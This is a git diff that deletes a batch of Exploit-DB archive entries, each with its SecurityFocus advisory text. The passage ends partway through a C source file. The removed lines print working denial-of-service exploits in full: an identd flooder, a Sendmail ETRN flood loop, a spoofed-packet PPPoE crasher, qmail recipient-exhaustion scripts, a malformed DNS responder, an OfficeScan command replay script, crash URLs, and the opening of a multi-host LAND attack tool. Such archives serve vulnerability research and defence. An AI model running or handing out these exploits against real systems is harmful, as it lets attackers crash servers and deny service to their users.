- * RedHat 5.0 - 6.0
- * Debian 2.0 - 2.1
- *
- * not tested:
- *
- * pre 4.3 SuSE systems
- * pre 5.0 RedHat
- * pre 2.0 Debian
- * other Slackware releases
- * Caldera Open Linux, ...
- *
- * please send me your results and experiences !
- *
-*/
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define GETIDENT "1027, 6667 : USERID : UNIX : killsuse"
-
-int sockdesc;
-int portkill;
-int numkill;
-int x;
-
-void usage(char *progname)
-{
- printf("susekill by friedolin (based on gewse.c)\n");
- printf("usage: %s <# of connections>\n",progname);
- exit(69);
-}
-
-main(int argc, char *argv[])
-{
-
- struct sockaddr_in sin;
- struct hostent *he;
-
- if (argc<3) usage(argv[0]);
-
- sin.sin_port = htons(113);
- sin.sin_family = AF_INET;
-
- he = gethostbyname(argv[1]);
- if (he) {
- sin.sin_family = AF_INET;
- sin.sin_port = htons(113);
- memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
- } else {
- perror("resolving");
- }
-
- numkill = atoi(argv[2]);
-
- printf("Flooding %s [%s] identd %d times.\n", argv[1], inet_ntoa(sin.sin_addr.s_addr), numkill);
- printf("Killing");
- fflush(stdout);
-
- for (x=1;x<=numkill;x++) {
-
- sockdesc = socket(AF_INET, SOCK_STREAM, 0);
-
- if (sockdesc < 0) {
- perror("socket");
- exit(69);
- }
-
- if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
- perror("connect");
- exit(69);
- }
-
- printf(" .");
- fflush(stdout);
- (void) write(sockdesc, GETIDENT, strlen(GETIDENT));
- }
-
- printf("\n");
-
-}
diff --git a/platforms/linux/remote/19701.sh b/platforms/linux/remote/19701.sh
deleted file mode 100755
index 8b13d96b8..000000000
--- a/platforms/linux/remote/19701.sh
+++ /dev/null
@@ -1,24 +0,0 @@
-source: http://www.securityfocus.com/bid/904/info
-
-There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server.
-
-#!/bin/sh
-
-TARGET=localhost
-COUNT=150
-SLEEP=1
-
-echo "gurghfrbl.sh - (c) lcamtuf '99"
-echo -n "Tickle"
-
-while :; do
-echo -n "."
-(
-NIC=0
-while [ "$NIC" -lt "$COUNT" ]; do
-echo "ETRN x"
-done
-) | telnet $TARGET 25 &>/dev/null &
-sleep $SLEEP
-killall -9 telnet &>/dev/null
-done
\ No newline at end of file
diff --git a/platforms/linux/remote/20494.pl b/platforms/linux/remote/20494.pl
deleted file mode 100755
index 4d1fe8658..000000000
--- a/platforms/linux/remote/20494.pl
+++ /dev/null
@@ -1,42 +0,0 @@
-source: http://www.securityfocus.com/bid/2098/info
-
-Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.
-
-PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.
-
-This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section.
-
-#!/usr/bin/perl
-# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.
-# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html
-# by dethy
-use Net::RawIP;
-use Getopt::Std;
-getopts('d:s:p:c',\%args) || &usage;
-if(defined($args{d})){$daddr=$args{d};}else{&usage;}
-if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}
-if(defined($port{p})){$port=$args{p};}else{&usage;}
-if(defined($args{c})){$count=$args{c};}else{$count=10;}
-
-sub randport(){
- srand;
- return $sport=(int rand 65510);
- }
-
-sub randsrc(){
- srand;
- return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255);
- }
-
- $packet = new Net::RawIP({ip=>{},tcp=>{}});
- $packet->set({ ip => { saddr => $src,
- daddr => $daddr,
- tos => 3 },
- tcp => { source => $sport,
- dest => $port,
- syn => 1, psh => 1 } });
-
- $packet->send(0,$count);
-
-sub usage(){ die("pppoe-link POC DoS on RH7\n$0 -d -s -p -c \n"); }
-
diff --git a/platforms/linux/remote/20561.pl b/platforms/linux/remote/20561.pl
deleted file mode 100755
index d99ae635f..000000000
--- a/platforms/linux/remote/20561.pl
+++ /dev/null
@@ -1,35 +0,0 @@
-source: http://www.securityfocus.com/bid/2237/info
-
-qmail is an e-mail server package developed by Dan Bernstein.
-
-The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.
-
-This behaviour is due to the dynamically allocated memory being exhausted.
-
-The condition occurs in situations where resource limits are not imposed on the server process.
-
-Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.
-
-Once affected, a restart of the qmail smtp service is required in order to gain normal functionality.
-
-It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.
-
-#!/usr/local/bin/perl -w
-# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $
-require 5.002;
-use strict;
-use Socket;
-if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;}
-my $port = 25; my $proto = getprotobyname("tcp");
-my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
-my $paddr = sockaddr_in($port, $iaddr);
-socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
-connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
-send(SKT,"mail from: \n",0) || die "send() $!";
-my $infstr = "rcpt to: \n"; print("Attacking..","\n");
-while(){
-send(SKT,$infstr,0) || die "send() $!";
-}
-die "Connection lost!";
-
-
diff --git a/platforms/linux/remote/20562.c b/platforms/linux/remote/20562.c
deleted file mode 100755
index bee3d161c..000000000
--- a/platforms/linux/remote/20562.c
+++ /dev/null
@@ -1,92 +0,0 @@
-source: http://www.securityfocus.com/bid/2237/info
-
-qmail is an e-mail server package developed by Dan Bernstein.
-
-The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.
-
-This behaviour is due to the dynamically allocated memory being exhausted.
-
-The condition occurs in situations where resource limits are not imposed on the server process.
-
-Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.
-
-Once affected, a restart of the qmail smtp service is required in order to gain normal functionality.
-
-It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.
-
-/*
- * qmail-dos-2 - run a qmail system out of swap space by feeding an infinite
- * amount of recipients.
- *
- * Usage: qmail-dos-2 fully-qualified-hostname
- *
- * Author: Wietse Venema. The author is not responsible for abuse of this
- * program. Use at your own risk.
- */
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-void fatal(char *fmt,...)
-{
- va_list ap;
-
- va_start(ap, fmt);
- vfprintf(stderr, fmt, ap);
- va_end(ap);
- putc('\n', stderr);
- exit(1);
-}
-
-chat(FILE * fp, char *fmt,...)
-{
- char buf[BUFSIZ];
- va_list ap;
-
- fseek(fp, 0L, SEEK_SET);
- va_start(ap, fmt);
- vfprintf(fp, fmt, ap);
- va_end(ap);
- fputs("\r\n", fp);
- if (fflush(fp))
- fatal("connection lost");
- fseek(fp, 0L, SEEK_SET);
- if (fgets(buf, sizeof(buf), fp) == 0)
- fatal("connection lost");
- if (atoi(buf) / 100 != 2)
- fatal("%s", buf);
-}
-
-int main(int argc, char **argv)
-{
- struct sockaddr_in sin;
- struct hostent *hp;
- char buf[BUFSIZ];
- int sock;
- FILE *fp;
-
- if (argc != 2)
- fatal("usage: %s host", argv[0]);
- if ((hp = gethostbyname(argv[1])) == 0)
- fatal("host %s not found", argv[1]);
- memset((char *) &sin, 0, sizeof(sin));
- sin.sin_family = AF_INET;
- memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
- sin.sin_port = htons(25);
- if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
- fatal("socket: %s", strerror(errno));
- if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
- fatal("connect to %s: %s", argv[1], strerror(errno));
- if ((fp = fdopen(sock, "r+")) == 0)
- fatal("fdopen: %s", strerror(errno));
- if (fgets(buf, sizeof(buf), fp) == 0)
- fatal("connection lost");
- chat(fp, "mail from:", fp);
- for (;;)
- chat(fp, "rcpt to:", argv[1]);
-}
diff --git a/platforms/linux/remote/21262.txt b/platforms/linux/remote/21262.txt
deleted file mode 100755
index 9f05fe7de..000000000
--- a/platforms/linux/remote/21262.txt
+++ /dev/null
@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/4018/info
-
-kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client.
-
-bash-2.05$ telnet 10.0.0.1 1030
-Trying 10.0.0.1...
-Connected to 10.0.0.1.
-Escape character is '^]'.
-garbage
-Connection closed by foreign host.
\ No newline at end of file
diff --git a/platforms/linux/remote/30430.txt b/platforms/linux/remote/30430.txt
deleted file mode 100755
index 567d0f6f9..000000000
--- a/platforms/linux/remote/30430.txt
+++ /dev/null
@@ -1,14 +0,0 @@
-source: http://www.securityfocus.com/bid/25117/info
-
-Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages.
-
-Successfully exploiting this issue allows remote attackers to add arbitrary IP addresses to the block list used by the application. This allows attackers to deny further network access to arbitrary IP addresses, denying service to legitimate users.
-
-Fail2ban 0.8.0 and prior versions are vulnerable to this issue.
-
-This issue may be demonstrated by connecting to an SSH server with 'nc', and sending the following string:
-
-ROOT LOGIN REFUSED hi FROM 1.2.3.4
-
-where '1.2.3.4' is an IP address to be blocked.
-
diff --git a/platforms/linux/remote/30744.txt b/platforms/linux/remote/30744.txt
deleted file mode 100755
index 0dba485a6..000000000
--- a/platforms/linux/remote/30744.txt
+++ /dev/null
@@ -1,22 +0,0 @@
-source: http://www.securityfocus.com/bid/26353/info
-
-MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input.
-
-Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers.
-
-This issue affects MySQL 5.1.23 and prior versions.
-
-mysql> CREATE TABLE `test` (
-`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
-`foo` text NOT NULL
-) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-Query OK, 0 rows affected
-
-mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
-Empty set
-
-mysql> ALTER TABLE test ADD INDEX (foo(100));
-Query OK, 0 rows affected
-Records: 0 Duplicates: 0 Warnings: 0
-
-mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
\ No newline at end of file
diff --git a/platforms/linux/remote/30895.pl b/platforms/linux/remote/30895.pl
deleted file mode 100755
index a06fe0524..000000000
--- a/platforms/linux/remote/30895.pl
+++ /dev/null
@@ -1,39 +0,0 @@
-source: http://www.securityfocus.com/bid/26902/info
-
-The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses.
-
-Successfully exploiting this issue allows attackers to crash applications that use the affected module.
-
-Net::DNS 0.60 is vulnerable; other versions may also be affected.
-
-#!/usr/bin/perl
-# Beyond Security(c)
-# Vulnerability found by beSTORM - DNS Server module
-
-use strict;
-use IO::Socket;
-my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
-$MAXLEN = 1024;
-$PORTNO = 5351;
-$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@";
-print "Awaiting UDP messages on port $PORTNO\n";
-
-my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
-"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03".
-"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79".
-"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00".
-"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62".
-"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f".
-"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03".
-"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69".
-"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e".
-"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01".
-"\x00\x01\x00\x00\x00\x01\x00\x01\x41";
-while ($sock->recv($newmsg, $MAXLEN)) {
- my($port, $ipaddr) = sockaddr_in($sock->peername);
- $hishost = gethostbyaddr($ipaddr, AF_INET);
- print "Client $hishost said ``$newmsg''\n";
- $sock->send($oldmsg);
- $oldmsg = "[$hishost] $newmsg";
-}
-die "recv: $!";
diff --git a/platforms/linux/remote/35432.txt b/platforms/linux/remote/35432.txt
deleted file mode 100755
index 86586d961..000000000
--- a/platforms/linux/remote/35432.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/46796/info
-
-Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference error.
-
-An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35432.pcap
\ No newline at end of file
diff --git a/platforms/multiple/local/10327.txt b/platforms/multiple/local/10327.txt
deleted file mode 100755
index 91c3049bc..000000000
--- a/platforms/multiple/local/10327.txt
+++ /dev/null
@@ -1,150 +0,0 @@
-Ghostscript is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied input.
-
-Exploiting this issue allows remote attackers to crash the application and possibly to execute code, but this has not been confirmed.
-
-
-Vulnerable: Ubuntu Ubuntu Linux 8.10 sparc
-Ubuntu Ubuntu Linux 8.10 powerpc
-Ubuntu Ubuntu Linux 8.10 lpia
-Ubuntu Ubuntu Linux 8.10 i386
-Ubuntu Ubuntu Linux 8.10 amd64
-Ubuntu Ubuntu Linux 8.04 LTS sparc
-Ubuntu Ubuntu Linux 8.04 LTS powerpc
-Ubuntu Ubuntu Linux 8.04 LTS lpia
-Ubuntu Ubuntu Linux 8.04 LTS i386
-Ubuntu Ubuntu Linux 8.04 LTS amd64
-Ubuntu Ubuntu Linux 6.06 LTS sparc
-Ubuntu Ubuntu Linux 6.06 LTS powerpc
-Ubuntu Ubuntu Linux 6.06 LTS i386
-Ubuntu Ubuntu Linux 6.06 LTS amd64
-Sun Solaris 9_x86
-Sun Solaris 9
-Sun Solaris 10_x86
-Sun Solaris 10
-Sun OpenSolaris build snv_99
-Sun OpenSolaris build snv_96
-Sun OpenSolaris build snv_95
-Sun OpenSolaris build snv_94
-Sun OpenSolaris build snv_93
-Sun OpenSolaris build snv_92
-Sun OpenSolaris build snv_91
-Sun OpenSolaris build snv_90
-Sun OpenSolaris build snv_89
-Sun OpenSolaris build snv_88
-Sun OpenSolaris build snv_87
-Sun OpenSolaris build snv_86
-Sun OpenSolaris build snv_85
-Sun OpenSolaris build snv_84
-Sun OpenSolaris build snv_83
-Sun OpenSolaris build snv_82
-Sun OpenSolaris build snv_81
-Sun OpenSolaris build snv_80
-Sun OpenSolaris build snv_78
-Sun OpenSolaris build snv_77
-Sun OpenSolaris build snv_76
-Sun OpenSolaris build snv_68
-Sun OpenSolaris build snv_67
-Sun OpenSolaris build snv_64
-Sun OpenSolaris build snv_61
-Sun OpenSolaris build snv_59
-Sun OpenSolaris build snv_57
-Sun OpenSolaris build snv_54
-Sun OpenSolaris build snv_50
-Sun OpenSolaris build snv_47
-Sun OpenSolaris build snv_45
-Sun OpenSolaris build snv_39
-Sun OpenSolaris build snv_36
-Sun OpenSolaris build snv_29
-Sun OpenSolaris build snv_22
-Sun OpenSolaris build snv_19
-Sun OpenSolaris build snv_13
-Sun OpenSolaris build snv_114
-Sun OpenSolaris build snv_113
-Sun OpenSolaris build snv_112
-Sun OpenSolaris build snv_111a
-Sun OpenSolaris build snv_111
-Sun OpenSolaris build snv_110
-Sun OpenSolaris build snv_109
-Sun OpenSolaris build snv_108
-Sun OpenSolaris build snv_107
-Sun OpenSolaris build snv_106
-Sun OpenSolaris build snv_105
-Sun OpenSolaris build snv_104
-Sun OpenSolaris build snv_103
-Sun OpenSolaris build snv_102
-Sun OpenSolaris build snv_101a
-Sun OpenSolaris build snv_101
-Sun OpenSolaris build snv_100
-Sun OpenSolaris build snv_02
-Sun OpenSolaris build snv_01
-S.u.S.E. SUSE Linux Enterprise Server 9
-S.u.S.E. SLE 11
-S.u.S.E. SLE 10
-S.u.S.E. openSUSE 11.1
-S.u.S.E. openSUSE 11.0
-S.u.S.E. openSUSE 10.3
-S.u.S.E. Open-Enterprise-Server 0
-S.u.S.E. Novell Linux Desktop 9
-rPath rPath Linux 2
-RedHat Fedora 9 0
-RedHat Fedora 8 0
-RedHat Enterprise Linux WS 4
-RedHat Enterprise Linux WS 3
-RedHat Enterprise Linux WS 2.1 IA64
-RedHat Enterprise Linux WS 2.1
-RedHat Enterprise Linux ES 4
-RedHat Enterprise Linux ES 3
-RedHat Enterprise Linux ES 2.1 IA64
-RedHat Enterprise Linux ES 2.1
-RedHat Enterprise Linux Desktop Workstation 5 client
-RedHat Enterprise Linux Desktop 5 client
-RedHat Enterprise Linux AS 4
-RedHat Enterprise Linux AS 3
-RedHat Enterprise Linux AS 2.1 IA64
-RedHat Enterprise Linux AS 2.1
-RedHat Enterprise Linux Desktop version 4
-RedHat Enterprise Linux 5 server
-RedHat Desktop 3.0
-Pardus Linux 2008 0
-MandrakeSoft Linux Mandrake 2009.0 x86_64
-MandrakeSoft Linux Mandrake 2009.0
-MandrakeSoft Linux Mandrake 2008.1 x86_64
-MandrakeSoft Linux Mandrake 2008.1
-MandrakeSoft Linux Mandrake 2008.0 x86_64
-MandrakeSoft Linux Mandrake 2008.0
-MandrakeSoft Corporate Server 4.0 x86_64
-MandrakeSoft Corporate Server 3.0 x86_64
-MandrakeSoft Corporate Server 3.0
-MandrakeSoft Corporate Server 4.0
-Ghostscript Ghostscript 8.15.2
-Ghostscript Ghostscript 8.0.1
-Ghostscript Ghostscript 8.61
-Ghostscript Ghostscript 8.60
-Ghostscript Ghostscript 8.57
-Ghostscript Ghostscript 8.56
-Ghostscript Ghostscript 8.54
-Ghostscript Ghostscript 8.15
-Avaya Proactive Contact 3.0.2
-Avaya Proactive Contact 4.1
-Avaya Proactive Contact 4.0
-Avaya Proactive Contact 3.0
-Avaya Proactive Contact 0
-Avaya Messaging Storage Server MSS 3.0
-Avaya Messaging Storage Server MM3.0
-Avaya Messaging Storage Server 5.0
-Avaya Messaging Storage Server 4.0
-Avaya Messaging Storage Server 3.1
-Avaya Messaging Storage Server 2.0
-Avaya Messaging Storage Server 1.0
-Avaya Messaging Storage Server
-Avaya Message Networking MN 3.1
-Avaya Message Networking 3.1
-Avaya Message Networking
-Avaya Intuity AUDIX LX 2.0 SP2
-Avaya Intuity AUDIX LX 2.0 SP1
-Avaya Intuity AUDIX LX 2.0
-Avaya Intuity AUDIX LX 1.0
-Avaya Intuity AUDIX
-
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
-
diff --git a/platforms/multiple/remote/19212.txt b/platforms/multiple/remote/19212.txt
deleted file mode 100755
index e12838843..000000000
--- a/platforms/multiple/remote/19212.txt
+++ /dev/null
@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/267/info
-
-A set of vulnerabilities in the counter.exe web hit counter program enables denial of service attacks.
-
-A malicious user can create a malformed like ",1" entry in the counter.log file by requesting a URL of the form "http://www.example.com/scripts/counter.exe?%0A". Any further attempt for request will result in an Access Violation in counter.exe.
-
-A similar vulnerability exists if a user requests a URL of the form "http://www.example.com/scripts/counter.exe?AAAAA" with over 2200 A's.
-
-All further requests for counter.exe are queued and are not processed until the error messages are cleared at the console. System memory may be decremented each time a request for counter.exe is queued.
-
diff --git a/platforms/multiple/remote/19230.txt b/platforms/multiple/remote/19230.txt
deleted file mode 100755
index 5612df231..000000000
--- a/platforms/multiple/remote/19230.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-source: http://www.securityfocus.com/bid/288/info
-
-Servers running PCAnywhere32 with TCP/IP networking are subject to a Denial of Service attack that will hang the server at 100% CPU utilization. A malicious user may initiate this DoS by connecting to tcp port 5631 on the PCAnywhere server input a large amount of data when prompted with "Please press ".
-
-Connect to tcp 5631. At the Please press prompt, transfer a large amount of data to the PCAnywhere server. This will peg the CPU utilization at 100%.
\ No newline at end of file
diff --git a/platforms/multiple/remote/19780.txt b/platforms/multiple/remote/19780.txt
deleted file mode 100755
index 1d8cfb475..000000000
--- a/platforms/multiple/remote/19780.txt
+++ /dev/null
@@ -1,49 +0,0 @@ -source: http://www.securityfocus.com/bid/1013/info - -Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager. - -There are several ways for an attacker to cause various denial of service conditions. - -Sending random data to port 12345 can cause tmlisten.exe to either consume 100% of the CPU cycles or cause a Visual C++ error and crash the machine. - -Furthermore, opening over 5 simultaneous connections to port 12345 while sending random data will cause the service to stop responding to requests. The service will have to be stopped and restarted on each client machine. - -It has also been reported that it is possible to cause a denial of service condition by making a single malformed GET request to port 12345. - -It is also possible for a local user to capture an administrative command by using a network sniffer. This command can then be modified and replayed against other clients to cause them to perform a variety of actions. Modifying the last two bytes of the request will change the client's response behaviour, including: - -04: full uninstallation of the OfficeScan client -06: launch a scan -07: stop a scan - -The client makes requests to a few CGI programs on the server, which respond with configuration information. One of these CGIs is cgiRqCfg.exe, which provides configuration details for scan behaviour. 
- -If an attacker were to set up a webserver with the same IP address as the valid server, duplicate the valid server's OfficeScan file structure, and disable the valid server, it would be possible to perform a more subtle DoS by leaving the client installed but modifying the config files to restrict the file types scanned, (for example: setting the client to only scan .txt files) or to restrict the types of drives scanned (for example: disabling scanning on removable, fixed, and CD-ROM drives). It is also possible to cause the client to move any infected files to any location on the local machine. - -It should also be noted that some intrusion detection systems may detect attacks against port 12345 as Back Orifice attempts, which has the potential to conceal the nature of these attacks. - -cgiRqCfg.exe provides to the client configuration settings which will disable scanning on all removable, fixed, and CDrom drives, and further will disable scanning for all files except those with the extension "YES IT's P0SS1bl3!" - -cgiOnStart.exe will need to be put on the attacking webserver as the client expects it. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-1.exe - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-2.exe - -this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response. 
- -#!/bin/sh -( -sleep 2 -echo "GET/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906HTTP/1.0" -echo "Host: "$1":12345" -echo "User-Agent: OfficeScan/3.5" -echo "Accept: */*" -echo -echo -sleep 5 -)| telnet $1 12345 2>&1 | tee -a ./log.txt - -Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef . This tool is a pre-compiled Windows binary with Visual Basic source. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-3.zip \ No newline at end of file diff --git a/platforms/multiple/remote/19965.txt b/platforms/multiple/remote/19965.txt deleted file mode 100755 index bd09f02a5..000000000 --- a/platforms/multiple/remote/19965.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/1246/info - -By default JetAdmin Web Interface Server listens on port 8000. If a malformed URL request is sent to port 8000 this will cause the server services to stop responding. The service must be stopped and restarted to regain normal functionality. - -http://target:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$ \ No newline at end of file diff --git a/platforms/multiple/remote/20239.txt b/platforms/multiple/remote/20239.txt deleted file mode 100755 index fc2dc8522..000000000 --- a/platforms/multiple/remote/20239.txt +++ /dev/null 
@@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/1713/info - -The OverView5 CGI interface by default is shipped with HP Openview Node Manager. - -HP Openview Node Manager can be compromised due to an unchecked buffer. By sending a specially crafted GET request comprised of 136 bytes to the web services (default port 80) through the Overview5 CGI interface, the SNMP service will crash. - -Successful exploitation, depending on the data entered, will allow the execution of arbitrary code. - -http://target/OvCgi/OpenView5.exe?Context=Snmp&Action=Snmp&Host=&Oid= \ No newline at end of file diff --git a/platforms/multiple/remote/20336.txt b/platforms/multiple/remote/20336.txt deleted file mode 100755 index a77abf3da..000000000 --- a/platforms/multiple/remote/20336.txt +++ /dev/null @@ -1,12 +0,0 @@ -source: http://www.securityfocus.com/bid/1868/info - -Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. - -eWave ServletExec is susceptible to a denial of service attack if a URL invoking the ServletExec servlet preceded by /servlet is requested. The ServletExec engine will attempt to bind a server thread over port 80 and if the web server is currently running, a java.net.BindException error will result thus halting all operations on the ServletExec engine. The web server is not affected by this vulnerability. Restarting the application is required in order to regain normal functionality. - -http://target/servlet/ServletExec - -or - -nc 10.0.0.1 80 -GET /servlet/ServletExec HTTP/1.0 \ No newline at end of file diff --git a/platforms/multiple/remote/20659.txt b/platforms/multiple/remote/20659.txt deleted file mode 100755 index d93353334..000000000 --- a/platforms/multiple/remote/20659.txt +++ /dev/null 
@@ -1,24 +0,0 @@ -source: http://www.securityfocus.com/bid/2442/info - -SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms. - -A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating. - -Therefore, it is possible for a malicious user to deny service to legitimate users by passing the predescribed request to the ftp server. - -# ftp localhost -Connected to testbak -220 SurgeFTP testbak (Version 1.0b) -User (testbak:(none)): anonymous -331 Password required for anonymous. -Password: -230- Alias Real path Access -230- / /home read -230 User anonymous logged in. -200 Port command successful. -150 Opening ASCII mode data connection for file list. (/) -226 Transfer complete. -ftp> ls .. -200 Port command successful. -550 Opening ASCII mode data connection for file list. (/..) --> ftp get:Connection reset by peer \ No newline at end of file diff --git a/platforms/multiple/remote/20810.c b/platforms/multiple/remote/20810.c deleted file mode 100755 index c95b6c811..000000000 --- a/platforms/multiple/remote/20810.c +++ /dev/null 
@@ -1,381 +0,0 @@
-source: http://www.securityfocus.com/bid/2666/info
-
-A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
-
-It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
-
-**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
-
-/*
- * imland - improved multiple land
- *
- * A good spanking session requires several good, hard slaps.
- *
- * This program lands multiple land attacks on multiple hosts as a
- * proof of concept of the oldly discovered but newly resurfaced
- * M$ `land' attack vulnerability. It was written without ill intent to
- * test a large range of servers for vulnerabilities in one go.
- *
- * If the targeted machines freeze up for 5-30 seconds for each packet,
- * that means they are vulnerable.
- *
- * Disclaimer:
- * This program was written without ill intent. It was designed to test
- * and prove the effects of the LAND attack on multiple hosts at once.
- * I am in no way responsible for what you do with this piece of code.
- *
- * Please use it responsibly to test your own servers only.
- *
- */
-
-#define _BSD_SOURCE
-#define __FAVOR_BSD
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-
-/* the attack packet */
-struct raw_tcp_packet {
- struct ip ip;
- struct tcphdr tcp;
-};
-
-/* required to make the TCP checksum correct */
-struct tcp_chksum_hdr {
- struct in_addr src;
- struct in_addr dest;
- u_char zero;
- u_char proto;
- u_short len;
- struct tcphdr tcp;
-};
-
-/* linked list with all we need, really */
-typedef struct target {
- struct sockaddr_in sa;
- struct {
- struct iphdr ip; /* included here so we can build them once */
